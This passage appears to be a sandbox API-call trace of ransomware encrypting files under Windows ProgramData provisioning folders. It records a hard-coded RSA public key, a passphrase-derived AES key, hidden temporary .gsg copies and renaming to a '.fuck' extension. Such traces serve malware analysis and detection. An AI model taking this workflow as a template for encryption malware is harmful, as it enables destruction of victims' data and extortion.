KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.078] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.079] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2833588) returned 1 [0237.080] CryptImportPublicKeyInfo (in: hCryptProv=0x2833588, dwCertEncodingType=0x1, pInfo=0x283ba48*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283ba78*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283ba80*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2817818) returned 1 [0237.080] CryptEncrypt (in: hKey=0x2817818, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.080] CryptEncrypt (in: hKey=0x2817818, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2832510*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2832510*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.080] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2832510, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.080] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.080] CryptEncrypt (in: hKey=0x28179d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.080] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.080] CloseHandle (hObject=0xffffffff) returned 1 [0237.080] CloseHandle (hObject=0xffffffff) returned 1 [0237.080] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml"), bFailIfExists=0) returned 0 [0237.081] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0237.081] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.gsg")) returned 0 [0237.081] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.fuck")) returned 0 [0237.081] CryptDestroyHash (hHash=0x2817458) returned 1 [0237.082] CryptDestroyKey (hKey=0x28179d8) returned 1 [0237.082] CryptReleaseContext (hProv=0x2832c80, dwFlags=0x0) returned 1 [0237.082] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.082] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.082] GetLastError () returned 0x5 [0237.082] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml")) returned 0x20 [0237.082] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0237.082] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.083] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.083] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.083] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28326a8) returned 1 [0237.088] CryptCreateHash (in: hProv=0x28326a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.088] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.088] CryptHashData (hHash=0x2817298, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.088] CryptDeriveKey (in: hProv=0x28326a8, Algid=0x6610, hBaseData=0x2817298, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2817b58) returned 1 [0237.088] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.088] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.088] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28333f0) returned 1 [0237.094] CryptImportPublicKeyInfo (in: hCryptProv=0x28333f0, dwCertEncodingType=0x1, pInfo=0x283bb18*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283bb48*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283bb50*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28178d8) returned 1 [0237.094] CryptEncrypt (in: hKey=0x28178d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.094] CryptEncrypt (in: hKey=0x28178d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2833478*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2833478*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.095] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2833478, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.095] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.095] CryptEncrypt (in: hKey=0x2817b58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.095] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.095] CloseHandle (hObject=0xffffffff) returned 1 [0237.095] CloseHandle (hObject=0xffffffff) returned 1 [0237.095] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0237.095] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0237.096] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml.gsg")) returned 0 [0237.096] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml.fuck")) returned 0 [0237.096] CryptDestroyHash (hHash=0x2817298) returned 1 [0237.096] CryptDestroyKey (hKey=0x2817b58) returned 1 [0237.096] CryptReleaseContext (hProv=0x28326a8, dwFlags=0x0) returned 1 [0237.096] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.096] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2817298 [0237.097] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.097] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.097] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2817458 [0237.098] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.098] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.098] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.098] GetLastError () returned 0x5 [0237.098] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0237.098] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0237.098] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.099] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.099] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.099] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2833500) returned 1 [0237.104] CryptCreateHash (in: hProv=0x2833500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.104] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.104] CryptHashData (hHash=0x2817758, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.104] CryptDeriveKey (in: hProv=0x2833500, Algid=0x6610, hBaseData=0x2817758, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2817858) returned 1 [0237.104] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.104] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.105] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28326a8) returned 1 [0237.106] CryptImportPublicKeyInfo (in: hCryptProv=0x28326a8, dwCertEncodingType=0x1, pInfo=0x283b7d8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283b808*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283b810*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2817ad8) returned 1 [0237.106] CryptEncrypt (in: hKey=0x2817ad8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.106] CryptEncrypt (in: hKey=0x2817ad8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2832c80*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2832c80*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.106] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2832c80, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.106] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.106] CryptEncrypt (in: hKey=0x2817858, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.106] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.107] CloseHandle (hObject=0xffffffff) returned 1 [0237.107] CloseHandle (hObject=0xffffffff) returned 1 [0237.107] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0237.108] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0237.108] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0237.108] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0237.109] CryptDestroyHash (hHash=0x2817758) returned 1 [0237.109] CryptDestroyKey (hKey=0x2817858) returned 1 [0237.109] CryptReleaseContext (hProv=0x2833500, dwFlags=0x0) returned 1 [0237.109] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.109] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.109] GetLastError () returned 0x5 [0237.109] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_1.provxml")) returned 0x20 [0237.109] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x80) returned 0 [0237.110] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_1.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.110] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_1.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.110] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.110] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2832d90) returned 1 [0237.116] CryptCreateHash (in: hProv=0x2832d90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.116] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.116] CryptHashData (hHash=0x2817758, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.116] CryptDeriveKey (in: hProv=0x2832d90, Algid=0x6610, hBaseData=0x2817758, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2817918) returned 1 [0237.116] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.116] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.116] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2832ea0) returned 1 [0237.117] CryptImportPublicKeyInfo (in: hCryptProv=0x2832ea0, dwCertEncodingType=0x1, pInfo=0x283ae18*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283ae48*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283ae50*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2817998) returned 1 [0237.117] CryptEncrypt (in: hKey=0x2817998, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.117] CryptEncrypt (in: hKey=0x2817998, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2832e18*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2832e18*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.117] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2832e18, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.118] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.118] CryptEncrypt (in: hKey=0x2817918, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x279e3a8*, 